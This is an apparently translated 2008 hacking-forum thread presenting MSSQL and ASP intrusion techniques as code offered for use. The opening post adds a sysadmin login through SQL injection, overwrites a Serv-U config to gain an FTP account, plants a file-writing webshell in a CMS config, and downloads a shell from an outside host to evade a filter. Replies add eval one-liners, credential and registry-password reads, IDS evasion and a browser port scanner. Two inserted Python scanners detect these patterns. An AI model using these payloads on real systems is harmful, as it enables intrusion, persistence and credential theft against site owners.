EvilOctal Security Team Technical Discussion Group's Archiver

伤心的鱼 2008-3-10 14:07

[Original] A few intrusion tricks I have used, collected together

Author: 伤心的鱼[BCT]

Preface:
This article was originally written on commission for 非安全 before the new year, but for some reason it was never published. I happened to find it today while tidying up, so I'll post it here.
I know EvilOctal is full of masters... please go easy on me. Rubbish article, just here to earn an "original" tag, masters please don't flame me..

Body:
From this article you can learn:
1. Some applications of MSSQL extended stored procedures
2. Inserting a one-line shell into a website configuration file
3. How to get past the 一流信息监控系统 (Yiliu information monitoring system)

This article is honestly rather miscellaneous, so I didn't know what title to give it, but believe me, after reading it you will pick up quite a few new ideas for the penetration process. OK, follow me!

1. Flexible use of SQL Server

We all know that during a penetration the way of thinking matters most; often one small detail decides success or failure. Heh, but theory is still only theory. Friends who have read my earlier articles know that I prefer to explain something through a concrete case. Since I am only describing an idea, I won't write a lot, just the classic parts; if people want it, I'll write a separate penetration article later that describes every method in detail. OK, let's begin!

A few days ago a friend threw me an SA injection point, but no matter what, commands could not be executed. He asked whether I could take a look. Since a friend asked, and it was said to be a really nasty SA box, I was happy to take the challenge. After getting the address, the first thing I did was telnet to its port 1433. Heh, many people probably don't pay attention to this: why telnet first? Because it is SA, as long as we can telnet in we can execute commands through the injection point and add a SQL login with SA privileges; running commands in Query Analyzer is far more convenient than through the injection point. Running telnet 61.129.251.x 1433 showed that a connection could be made. OK, so right away I executed the following through the injection point:


exec master.dbo.sp_addlogin 'fishing', 'hook';
exec master.dbo.sp_addsrvrolemember 'fishing', 'sysadmin';


These commands add a SQL login named fishing with the password hook and give it SA-level (sysadmin) rights. Both executions returned success on the page, so the login was added. Connecting with SQL Server's Query Analyzer and running exec master.dbo.xp_cmdshell 'net user' produced this error:


错误消息
50001,级别 1,状态 50001
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)


Many people have asked me what this error means, so let me explain; it is actually simple. The error plainly says that CreateProcess failed to create a process, and everyone should know which process xp_cmdshell launches: the CMD process could not be created! Perhaps the permissions on CMD were set to deny SYSTEM access, or perhaps CMD was deleted or renamed. Any of these makes the CMD process fail to start, see Figure 1.

Figure 1

So logging in to the server by directly adding a user was out. Some may say: isn't there still SP_OAcreate? But when I used SP_OAcreate to execute:


DECLARE @shell INT;
EXEC SP_OAcreate 'wscript.shell', @shell OUTPUT;
EXEC SP_OAMETHOD @shell, 'run', null, 'C:\WINdows\system32\cmd.exe /c net user fish sadfish /add';


it reported success, but the user had not been added; my first guess was that wscript.shell had been removed.
Also, if the xp_regwrite stored procedure existed we could still have used the sandbox mode trick. Although these three important stored procedures were all unusable, we could still use xp_subdirs to list directories. While listing drive D: I found that the server had Serv-U installed; clever readers will have already guessed what comes next. We can use FSO to write configuration into Serv-U's ServUDaemon.ini and add an FTP user with system privileges. No sooner said than done; first I used:


declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end


This code uses the OLE automation stored procedures to read the configuration in d:\Serv-U6.3\ServUDaemon.ini; it returned success, see Figure 2.
Figure 2

Since we can read it, can we write one in too? Continue with:


declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 《fill in your own prepared Serv-U configuration here: everything copied a moment ago must be written back, with our own entry appended at the end, the same as Serv-U privilege escalation from a webshell》


Press F5 to execute; the command succeeds. Re-check immediately with the read statement above, and the content has been written, see Figure 3.

Figure 3

OK, I don't need to say more about the rest, do I? FTP in, add a user directly and log in to the server, and that's that; I won't waste words here. See? During a penetration, care plus flexible use of knowledge gets a perfect result.


2. Inserting a shell into a website configuration file


Many people will have played with the MY动力 (MyPower) management system, but its admin back-end is a bit nasty. Although it has database backup, it does not allow a custom path, and the database also contains
<% loop <% that cannot be closed, so database backup is nearly useless. Someone earlier suggested restoring first and then backing up, but I did not get that to work.
The method taught here is inserting a shell via the configuration file. I won't discuss how to get into the back-end, whether by injection or by downloading the default database; as long as you can get in, that's fine. Once in the back-end, under General Settings there is a website information configuration; open it, see Figure 4.

Figure 4
The copyright field shows "版权所有 Copyright? 2003 <a href='http://www.asp163.net'>动力空间</a>", which ships with the system. Because the length of the input is not limited here, we can plant something resembling a small shell. Note that I say resembling, not an actual shell (editor's note: it really is a small shell). Replace the copyright field directly, keeping its original statement at the front; the replacement code is as follows:


版权所有 Copyright? 2003 <a href='http://www.asp163.net'>动力空间</a>" 'copyright info

if Request("xiaoxin")="520" then
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "小新恭喜"
end if
Response.write "<form method='POST' action='"&Request.ServerVariables("URL")&"?xiaoxin=520&creat=yes'>"
Response.write "<textarea name='text'>"&thisline&"</textarea><br>"
Response.write "<input type='text' name='path' value='"&Request("path")&"'>"
Response.write "<input name='submit' type='submit' value='ok' ></form>"
Response.end
end if
%>


Then save, and be very careful at this point not to navigate to any other page. In the IE address bar replace admin/Admin_Login.asp with inc/config.asp?xiaoxin=520. Why? Because the code in the copyright field above is a submission program written using the file information of inc/config.asp.
When you enter that page you will think: what on earth is this? It looks like a small shell. Well, use it as one: write your ASP trojan code in the upper box and the path in the lower one, see Figures 5 and 6.

Figure 5
Figure 6
How about that? Got a shell, right? One thing to note: although we have the shell, the website is now broken, so we need to go into the shell, find config.asp, and remove the "小新恭喜" from it, and it's fine.
It's not only the MY动力 management system; the 动易 (PowerEasy) article system used to have the same problem: write "%><%eval(request("xiaozhi"))%><%' into the webmaster mailbox field, then connect directly to
config.asp under the inc directory. Because a lot of site information is written into config.asp, friends with time can test this themselves (editor: readers who know ASP can study for themselves whether an ASP program uses FSO for its back-end configuration file, which basically means the configuration is written into an ASP file).


3. Getting past the 一流信息监控系统 to achieve file "upload"

Many friends may have met this problem: after obtaining a small shell, when uploading a big shell the server responds with an error: 很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词,本次操作无效,系统已记录您的IP及您提交的所有数据。请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:98424b88afb8, see Figure 7.

Figure 7
I thought switching to a different big shell would do, but I tried N shells and none worked. I thought submission might be blocked, but submitting a few random characters was fine; it turns out it restricts the submitted characters, and as long as our big shell contains special characters the submission is rejected. We still have a way around it, though.

This is like uploading an EXE when the site forbids the upload: we can instead have the server download the target file from outside. VBS, say? Heh. OK, the method is: as long as the server has not disabled the XML and data stream components, we submit the following ASP script to the server; the code is:


<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET", "http://www.hack521.cn/fish.txt", False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("fish.asp"),2
set sGet = nothing
set xPost = nothing
%>


Using the server's XML and ADODB.Stream components, the content of fish.txt from my blog is downloaded into the target site's root directory and saved as fish.asp. The content of fish.txt is of course the content that was being intercepted, i.e. our big shell. Afterwards, visiting the submitted ASP file shows a blank page; then visiting fish.asp shows that the content we wanted to upload has been saved successfully! See Figure 8.

Figure 8
How was it, dear reader? Did you learn something? Do you have a new idea in your head? In this issue I used three cases to explain methods that everyone knows but rarely uses. Many people have asked me why, when everyone knows the methods in my articles, they never think of them themselves? Same old answer: keep your thinking clear; penetration is meticulous work, and only patience brings calm. My ID is CNSST, or add my QQ: 459014. See you next issue!


Editor's note: MSSQL is a powerful database, and whoever can flexibly use the extensions it offers is no ordinary expert. As for writing a shell into a configuration file: so that the site keeps running after the shell is written, what goes into Config.asp should be a fault-tolerant one-liner, for example <%if request("cmd")<>"" then execute request("cmd")%> or <%on error resume next:execute request("cmd")%> and so on. If you can skilfully use some of MS's components, you are an expert too.
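The two web-side tricks above (the copyright-field injection into inc/config.asp and the XMLHTTP + ADODB.Stream fetch that sidesteps a keyword filter) both leave recognisable shapes in the ASP files on disk, and the editor's one-liners are a third. The following Python scanner is an added example for site owners, not code from the post; its regexes and the sample files it builds in a temporary directory are constructed for illustration. It also flags the unbalanced <% / %> that the copyright injection leaves behind, which is the reason the author says the site breaks once the shell is planted.

```python
"""Indicator scan for the ASP "configuration file shell" and remote-fetch
patterns described in the post. Added example, not code from the post.
Signatures and sample files are constructed here for illustration."""
import os
import re
import tempfile

# Each indicator: (name, compiled regex). The regexes are assumptions chosen to
# match the code shapes shown in the post, not a complete web-shell signature set.
INDICATORS = [
    # <%execute request("cmd")%>, eval(request("x")) and the on error resume next variant
    ("request-eval", re.compile(r"\b(execute|eval)\s*\(?\s*request\s*\(", re.I)),
    # FSO file creation with the target path taken straight from the request
    ("fso-write-from-request",
     re.compile(r"CreateTextFile\s*\(\s*server\.mappath\s*\(\s*request\s*\(", re.I)),
    # XMLHTTP fetch + ADODB.Stream SaveToFile: fetch-to-disk used to defeat keyword filters
    ("remote-fetch-to-disk",
     re.compile(r"Microsoft\.XMLHTTP[\s\S]*?ADODB\.Stream[\s\S]*?SaveToFile", re.I)),
]


def delimiter_imbalance(text):
    """Return count('%>') - count('<%'). A config file whose string constants are
    rewritten by the back-end normally has balanced delimiters; injected code that
    closes the block early (the copyright-field trick) leaves an extra '%>'."""
    return text.count("%>") - text.count("<%")


def scan_text(text):
    """Return the sorted list of indicator names that fire on one file's content."""
    hits = {name for name, rx in INDICATORS if rx.search(text)}
    if delimiter_imbalance(text) != 0:
        hits.add("unbalanced-asp-delimiters")
    return sorted(hits)


def scan_root(root):
    """Walk a web root; return {relative path: [indicators]} for ASP files with hits."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith((".asp", ".inc", ".asa")):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings


# Constructed samples: a clean config, the copyright-field injection, the
# editor's one-liner, and the fetcher script.
CLEAN_CONFIG = '<%\nconst SiteName="Demo"\nconst Copyright="(c) 2003 <a href=\'#\'>x</a>" \'copyright\n%>\n'
INJECTED_CONFIG = (
    '<%\n'
    'const Copyright="(c) 2003 <a href=\'#\'>x</a>" \'copyright\n'
    'if Request("k")="1" then\n'
    'Set fs = CreateObject("Scripting.FileSystemObject")\n'
    'Set outfile=fs.CreateTextFile(server.mappath(Request("path")))\n'
    'outfile.WriteLine Request("text")\n'
    'end if\n'
    '%>\n'
    'const Footer="x"\n'
    '%>\n'
)
ONE_LINER = '<%on error resume next:execute request("cmd")%>\n'
FETCHER = ('<%\nSet xPost = CreateObject("Microsoft.XMLHTTP")\n'
           'xPost.Open "GET", "http://example.invalid/payload.txt", False\n'
           'xPost.Send()\nSet sGet = CreateObject("ADODB.Stream")\n'
           'sGet.Write(xPost.responseBody)\nsGet.SaveToFile Server.MapPath("f.asp"), 2\n%>\n')


def demo():
    """Build a throwaway web root with the samples and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "inc"))
        for rel, body in (("inc/config.asp", INJECTED_CONFIG), ("inc/clean.asp", CLEAN_CONFIG),
                          ("inc/conn.asp", ONE_LINER), ("up.asp", FETCHER), ("readme.txt", FETCHER)):
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_root(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(f"{path}: {', '.join(hits)}")
```

The delimiter check is deliberately crude: a legitimate file with a `%>` inside a string literal would trip it, so treat it as a prompt to diff the file against the shipped version rather than as proof of compromise. The regex indicators are the ones worth alerting on directly.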

伤心的鱼 2008-3-10 14:08

Rubbish article; just posting to get my face known. Haven't been here for a long time, just watching the fun.... thanks, masters...

passedbylove 2008-3-10 18:18

Some SQL statements - hope they help (original; the code hasn't been tidied and some parts are invalid)

--Get the SQL Server installation path on the remote host:
exec xp_instance_regread 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\MSSQLServer\Setup', 'SQLPath'
---------------------------------------------------------------------
--List logins and password hashes
---------------------------------------------------------------------
use master
select
        [name] as 数据库用户,
        password as 用户密码,
        language as 当前语言
from sysxlogins where name is not null
--List database users
use model select name as 数据库操作员列表 from sysusers


---------------------------------------------------------------------
--First grant the Windows NT domain user access,
--then create a new Microsoft SQL Server login
---------------------------------------------------------------------
EXEC sp_grantlogin 'jcb-27\Administrator'
EXEC sp_addlogin 'administrator' --Inside of Net user's
--Query the account, account type, privilege level, mapped login name and the permission path by which the account accesses Microsoft SQL Server
EXEC xp_logininfo 'BUILTIN\Administrators'



--List accounts with an empty password that have logged in
---------------------------------------------------------------------
Select name,Password from syslogins where password is null

----------------------------------------------------------------------

----------------------------------------------------------------------
--ALTER LOGIN [sa] WITH NAME=[zxs] /*rename the SA account*/
/*change the SA password*/
exec sp_password null,'sa','sa'
--exec master..sp_password @old='sa'/*old password*/,@new=null/*new password*/,@loginame='sa'/*login name*/
exec master..xp_msver ProductName,language,WindowsVersion,FileDescription
exec master..xp_Msgetversion
----------------------------------------------------------------------


--System error messages
select * from sysmessages where msglangid='2052'--error message language ID
--select name,filename from sysdatabases where name is not null
select name,crdate as 创建日期,filename as 文件路径  from sysdatabases where name is not null
----------------------------------------------------------------------
--Query SQL Server information (reserved)
select @@version as SQL版本信息以及操作系统版本
----------------------------------------------------------------------
declare @Os_language varchar(500)
set @Os_language=(select @@version)
--note: a T-SQL variable is not expanded inside the xp_cmdshell string; this is one of the untidied lines
exec master..xp_cmdshell 'echo @Os_language|find /i "sql"'
-----------------------------------------------------------------------
--Determine the target operating system
-----------------------------------------------------------------------
select name as 操作系统语言 from syslanguages where langid=(select @@LANGID)
select @@language as SQL服务器所用语言
if ((select name from syslanguages where langid=(select @@LANGID))=(select @@language))
   print '@@language查询结果和数据库master表中通过langid定位的语言一致'
----------------------------------------------------------------------------------------------------------------------------------
select user as 数据库当前操作员用户名
SELECT @@NESTLEVEL
--select loginname,hostname,dbname
USE master EXEC sp_who
USE master EXEC sp_who 'active'
select @@SERVERNAME as 服务器名称
select @@SERVICENAME as 数据系统服务名
--confirm the operating system version
exec Sp_addextendedproc '_GetXpVersion','C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'
exec master.._GetXpversion
exec master..xp_qv
exec xp_msver

use master
exec Sp_addextendedproc 'xp_regread','C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'
exec xp_regread HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion', 'ProductName'
exec xp_regread HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon','DefaultPassword'
exec xp_regread HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon','DefaultUserName'
Exec master..xp_cmdshell 'ver|find /i "xp"||(ver|find /i "2000")||(ver|find /i "98")||(ver|find /i "2003")||(ver|find /i "nt")'
--List the users of the remote computer's local domain
Exec master..xp_cmdshell 'net user'
Exec master..xp_cmdshell 'net accounts'
Exec master..xp_cmdshell 'ver|find /i "xp"&&systeminfo'
exec master..xp_cmdshell '(echo %systemroot%|find /i "winnt">nul)&&if errorlevel 0 (echo 系统文件夹是winnt,可能是Windows 2K操作系统) else (echo 系统文件夹windows)'
--SELECT count(*) FROM master.dbo.sysobjects
--exec master..xp_regenumvalues HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion'
--exec master..xp_servicecontrol 'start','schedule'
exec master..Xp_availablemedia --show the usable drives on the machine
exec master..xp_cmdshell 'cmd.exe /c for %i in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: q: r: s: t: u: v: w: x: y: z: ) do @if exist %i echo %i'
--exec master..Xp_dirtree --allows obtaining a directory tree
exec master..Xp_enumdsn --lists the ODBC data sources on the server
exec master..Xp_loginconfig --Reveals information about the security mode of the server
--exec master..Xp_makecab --allows the user to create a compressed file on the server
exec master..Xp_ntsec_enumdomains --lists the domains the server can reach
exec master..Xp_terminate_process 484 --given a process ID, terminates that process
--Bypass IDS detection [using a variable]
--declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
--declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
--the connection string parameter can use any port for the connection, for example
--select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=sa;Network=DBMSSOCN;Address=127.0.0.1,1433;','select * from table')
--copy the target host's entire database: insert all remote tables into local tables.
use master
Select name,Password from syslogins where password is null
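Both the article's first section and the statement collection above lean on the same handful of system procedures (sp_addlogin, sp_addsrvrolemember, xp_cmdshell, sp_OACreate, xp_regread, xp_subdirs, sp_addextendedproc) plus the 'xp_'+'cmdshell' variable trick for slipping past IDS string matching. The following Python detector is an added example, not code from either post: it tags statements from a constructed audit-log format with those procedure families, catches the concatenated or variable-held procedure name that a plain xp_cmdshell match would miss, and raises an alert when one login creates a new login and then promotes it to sysadmin, or falls back to OLE automation after xp_cmdshell. The line format, the rule grouping and the sample lines are all constructed; a real deployment would read SQL Server Audit or trace exports instead.

```python
"""Tag SQL Server statements with the procedure families used in the thread and
correlate them per login. Added example, not code from the thread; the audit-line
format, the rule grouping and the sample lines are constructed assumptions."""
import re
from collections import defaultdict

# Rule name -> regex over statement text. Procedure names are the ones quoted in the
# posts; the grouping into families is an assumption for this example.
RULES = [
    ("login-create", r"\bsp_(addlogin|grantlogin)\b"),
    ("sysadmin-grant", r"\bsp_addsrvrolemember\b.*\bsysadmin\b"),
    ("os-command", r"\bxp_cmdshell\b"),
    ("ole-automation", r"\bsp_oa(create|method|getproperty)\b"),
    ("registry-access", r"\bxp_(instance_)?reg(read|write|enumvalues)\b"),
    ("filesystem-enum", r"\bxp_(subdirs|dirtree|availablemedia)\b"),
    ("extproc-registration", r"\bsp_addextendedproc\b"),
    ("credential-read", r"\bfrom\s+sysx?logins\b.*\bpassword\b"),
    # 'xp_'+'cmdshell' or exec @var: the IDS-evasion shape from the statement list
    ("dynamic-proc-name", r"\bexec(ute)?\s+@\w+|'\s*\+\s*'\w*(cmd|shell|oa)\w*'"),
]
COMPILED = [(name, re.compile(rx, re.I)) for name, rx in RULES]

# Constructed audit-line format: "<date> <time> login=<x> host=<y> text=<statement>"
LINE_RX = re.compile(r"^(?P<ts>\S+ \S+) login=(?P<login>\S+) host=(?P<host>\S+) text=(?P<text>.*)$")


def parse_line(line):
    """Parse one audit line into a dict, or None if it does not match the format."""
    m = LINE_RX.match(line.strip())
    return m.groupdict() if m else None


def classify(statement):
    """Return the sorted list of rule names that fire on one statement."""
    return sorted(name for name, rx in COMPILED if rx.search(statement))


def analyse(lines):
    """Return (events, alerts): events are (ts, login, tags) for tagged statements,
    alerts are (login, message) for the per-login sequences below."""
    events, alerts = [], []
    seen = defaultdict(set)          # login -> rule names already observed
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        tags = classify(ev["text"])
        if not tags:
            continue
        login = ev["login"]
        events.append((ev["ts"], login, tags))
        # sp_addlogin followed by sp_addsrvrolemember ... sysadmin from the same
        # login is the move from an injection point to a Query Analyzer session.
        if "sysadmin-grant" in tags and "login-create" in seen[login]:
            alerts.append((login, "new login promoted to sysadmin"))
        # xp_cmdshell then sp_OA*: the fallback the article walks through when
        # CreateProcess fails.
        if "ole-automation" in tags and "os-command" in seen[login]:
            alerts.append((login, "OLE automation attempted after xp_cmdshell"))
        seen[login].update(tags)
    return events, alerts


# Constructed sample log; hosts and logins are placeholders.
SAMPLE_LOG = """\
2008-03-10 14:07:01 login=webapp host=WEB01 text=select top 10 title from news
2008-03-10 14:07:05 login=webapp host=WEB01 text=exec master.dbo.sp_addlogin 'fishing','hook'
2008-03-10 14:07:06 login=webapp host=WEB01 text=exec master.dbo.sp_addsrvrolemember 'fishing','sysadmin'
2008-03-10 14:08:10 login=fishing host=CLIENT-PC text=exec master.dbo.xp_cmdshell 'net user'
2008-03-10 14:08:30 login=fishing host=CLIENT-PC text=DECLARE @shell INT; EXEC sp_OACreate 'wscript.shell', @shell OUTPUT
2008-03-10 14:09:00 login=fishing host=CLIENT-PC text=declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\\'
2008-03-10 14:09:20 login=reporting host=APP02 text=select name,password from syslogins where password is null
"""

if __name__ == "__main__":
    evs, als = analyse(SAMPLE_LOG.splitlines())
    for ts, login, tags in evs:
        print(ts, login, ", ".join(tags))
    for login, msg in als:
        print("ALERT", login, msg)
```

Note that the sixth sample line never contains the string xp_cmdshell, so the os-command rule stays silent on it; only the dynamic-proc-name rule fires. That is the gap the variable trick exploits, and the reason a statement-level signature list needs a rule for procedure names assembled at run time, not just a list of procedure names.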

passedbylove 2008-3-12 21:01

Posting an HTML page that port-scans with JavaScript (with comments added)

<html>
<!-- Dug up from a foreign website, heh -->
<style type="text/css">

input {
   star : expression(
     onmouseover=function(){this.style.backgroundColor="#FF0000"},
     onmouseout=function(){this.style.backgroundColor="#FFFFFF"}
     )
}
</style>
<form>
<label for="target">Target host</label>
(for a URL there is no need to give the transport protocol; http:// is assumed)<br/>
<input type="text" name="target" value="www.gnucitizen.org" alt="Enter the target host"/><br/>
<label for="port">Port</label><br/>
<input type="text" name="port" value="80" alt="Enter the ports to scan"/><br/>
<p>You can enter several in order: 80,81,8080</p>
<label for="timeout">Timeout (default 100 ms)</label><br/>
<input type="text" name="timeout" value="1000"/><br/>
<label for="result">Result</label><br/>
<textarea id="result" name="result" rows="7" cols="50" onClick="this.value=''"></textarea><br/>
<input class="button" type="button" value="scan" onClick="scan(this.form)"/>
</form>

<script>

var AttackAPI = {
version: '0.1',
author: 'Petko Petkov (architect)',
homepage: 'http://www.gnucitizen.org'};

AttackAPI.PortScanner = {};
AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) { // function taking parameters
var timeout = (timeout == null)?100:timeout; // default timeout is 100 ms
var img = new Image();

// load and error both mean something answered on the port before the timeout
img.onerror = function () {
    if (!img) return;
    img = undefined;
    callback(target, port, '开放');
};

img.onload = img.onerror;
img.src = 'http://' + target + ':' + port;

// nothing answered within the timeout
setTimeout(function () {
    if (!img) return;
    img = undefined;
    callback(target, port, '关闭');
}, timeout);
};
AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout)
{
for (var index = 0; index < ports.length; index++)
    AttackAPI.PortScanner.scanPort(callback, target, ports[index], timeout);
};
</script>
<script>
var result = document.getElementById('result');
var callback = function (target, port, status) {
result.value += target + ':' + port + ' ' + status + "\n";
};
var scan = function (form) {
AttackAPI.PortScanner.scanTarget(callback, form.target.value, form.port.value.split(','), form.timeout.value);
};
</script>
</html>

passedbylove 2008-3-12 21:02

HTML file that accesses MS SQL from JavaScript (adapted)

<html>
<head>
<title>Display table records in a table</title>
</head>
<body>
   <h2>Display table records in a table</h2>
   <hr>
   <script language="JavaScript">
    // ADODB through ActiveXObject only works in Internet Explorer with ActiveX enabled
    var objdbConn = new ActiveXObject("ADODB.Connection");
    var strdsn = "Driver={SQL Server};SERVER=localhost;UID=sa;PWD=sa;DATABASE=master";
    objdbConn.Open(strdsn);
    var objrs = objdbConn.Execute("Select name,Password from syslogins where password is null");

    var fdCount = objrs.Fields.Count - 1;
    if (!objrs.EOF){
     document.write("<table border=1><tr>");
     for (var i=0; i <= fdCount; i++)
      document.write("<td><b>" + objrs.Fields(i).Name + "</b></td>");
     document.write("</tr>");
     while (!objrs.EOF){
      document.write("<tr>");
      for (i=0; i <= fdCount; i++)
       document.write("<td valign='top'>" + objrs.Fields(i).Value + "</td>");
      document.write("</tr>");
      objrs.moveNext(); // move to the next record
     }

     document.write("</table>");
    }
    else
     document.write("数据库内没有记录!<br>");
    objrs.Close(); // close the recordset
    objdbConn.Close(); // close the database connection
   </script>
</body>
</html>

passedbylove 2008-3-12 21:10

Experts, take a look at the HTML files in this article that connect to SQL Server from JavaScript

Combining North Pole with South Pole: JavaScript with SQL Server 2000

Every DBA/database developer would certainly be shocked to think about
a relationship between client-side JavaScript and SQL Server 2000.
It's real.
Not every programmer knows that we can connect and break into SQL Server 2000
simply by using client-side JavaScript.

This article covers the positive aspects of connecting to a SQL Server 2000 database
lying on the client computer (or the browser computer).
If you are new to working with the types of examples in this article,
I suggest you go through my series "Advanced JavaScript with Internet Explorer"
on this web site.

You can directly copy and paste all of the code samples present in this article
into a file with the extension ".htm" and open in Internet Explorer 5.5+.

To successfully connect to the database, the database must be installed
with WMI extensions of SQL Server 2000.

First of all, you need to install "WMI SQL Server Administration Provider" on
an existing instance of SQL Server 2000 (if it is not already installed).
This is not part of the default or custom installation.
You need to install it separately from SQL server installations.
You can find the "WMI SQL Server Administration Provider" installation files
at the "x86\other\wmi" path of your SQL Server 2000 installation CD.

To be frank, I really didn't check this on SQL Server 7.0.
So, my focus will always be on SQL Server 2000 in this article.

How to get a list of all database names existing in a SQL Server 2000 instance using JavaScript

Now, let us try to develop a simple script (JavaScript)
which shows the technique for retrieving
all database names available in an SQL Server 2000 instance.

The entire code for the sample is as follows:

<!DOCTYPE  HTML  PUBLIC  "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
      <head>
            <title></title>
            <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
            <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
            <script id="clientEventHandlersJS" language="javascript">
            <!--

            function Button1_onclick() {
                  var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
                  var service = locator.ConnectServer(".","root\\MicrosoftSQLServer");
                  var properties = service.ExecQuery("SELECT Name FROM MSSQL_Database");
                  var e = new Enumerator (properties);
                  document.write("<table border=1>");
                  dispHeading();
                  for (;!e.atEnd();e.moveNext ())
                  {
                        var p = e.item ();
                        document.write("<tr>");
                        document.write("<td>" + p.Name + "</td>");
                        document.write("<td>" + p.SQLServerName + "</td>");
                        document.write("</tr>");
                  }
                  document.write("</table>");
            }

            function dispHeading()
            {
                  document.write("<thead>");
                  document.write("<td>Name</td>");
                  document.write("<td>SQLServerName</td>");
                  document.write("</thead>");
            }

            //-->
            </script>
      </head>
      <body>            
      <INPUT id="Button1" type="button" value="Button" name="Button1" language="javascript" onclick="return Button1_onclick()">
      </body>
</html>

In the above code the "meta" tags are not necessary.
They have been automatically added by Visual Studio.
The above code will automatically list all database
names available in the SQL Server 2000 instance belonging to the client.

It mainly lists the names of databases along with the SQL Server Name
(in this case we are connecting only to the default instance).

To retrieve this information, I used a built-in class,
"MSSQL_Database," available in the "root\MicrosoftSQLServer" namespace.
The "for" loop I used in the above code iterates for
every database present in the SQL Server instance and finally retrieves only the properties of that database.







Combining North Pole with South Pole: JavaScript with SQL Server 2000 - How to get a list of all table names available in a SQL Server 2000 database using JavaScript

As the previous section has shown only the database names,
we shall now try to develop a simple script (JavaScript) which shows the technique for retrieving
all table names available in a SQL Server 2000 database.
The entire code for the sample is as follows:

<!DOCTYPE  HTML  PUBLIC  "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
      <head>
            <title></title>
            <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
            <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
            <script id="clientEventHandlersJS" language="javascript">
                        <!--
                        function Button1_onclick() {
                                  var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
                                  var service = locator.ConnectServer(".","root\\MicrosoftSQLServer");
                                  var properties = service.ExecQuery("SELECT Name FROM MSSQL_Table WHERE DatabaseName = 'Northwind'");
                                  var e = new Enumerator (properties);
                                  document.write("<table border=1>");
                                  dispHeading();
                                  
                                  for (;!e.atEnd();e.moveNext ())
                                  {
                                                var p = e.item ();
                                                document.write("<tr>");
                                                document.write("<td>" + p.Name + "</td>");
                                                document.write("</tr>");
                                  }
                                  document.write("</table>");
                        }
                       
                        function dispHeading()
                        {
                                  document.write("<thead>");
                                  document.write("<td>Name</td>");
                                  document.write("</thead>");
                        }
                       
                        //-->
            </script>
      </head>
      <body>
            <INPUT id="Button1" type="button" value="Button" name="Button1" language="javascript" onclick="return Button1_onclick()">
      </body>
</html>  

The above code will automatically list all table names available in the database
"Northwind" of a SQL Server 2000 instance belonging to the client.
To retrieve this information, I used a built-in class, "MSSQL_Table,"
available in the "root\MicrosoftSQLServer" namespace.
The "for" loop I used in the above code iterates for every table present in the SQL Server database and finally retrieves only the properties of that table.









Combining North Pole with South Pole: JavaScript with SQL Server 2000 - How to get a list of all columns along with their table names available in a SQL Server 2000 database using JavaScript

As the previous section has shown only the table names,
we shall now try to develop a simple script (JavaScript) which shows the technique for retrieving all column names available in a SQL Server 2000 database.
The entire code for the sample is as follows:

<!DOCTYPE  HTML  PUBLIC  "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
      <head>
            <title></title>
            <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
            <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
            <script id="clientEventHandlersJS" language="javascript">
            <!--

            function Button1_onclick() {
                  var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
                  var service = locator.ConnectServer(".","root\\MicrosoftSQLServer");
                  var properties = service.ExecQuery("SELECT Name,TableName FROM MSSQL_Column WHERE DatabaseName = 'Northwind'");
                  var e = new Enumerator (properties);
                  document.write("<table border=1>");
                  dispHeading();
                  for (;!e.atEnd();e.moveNext ())
                  {
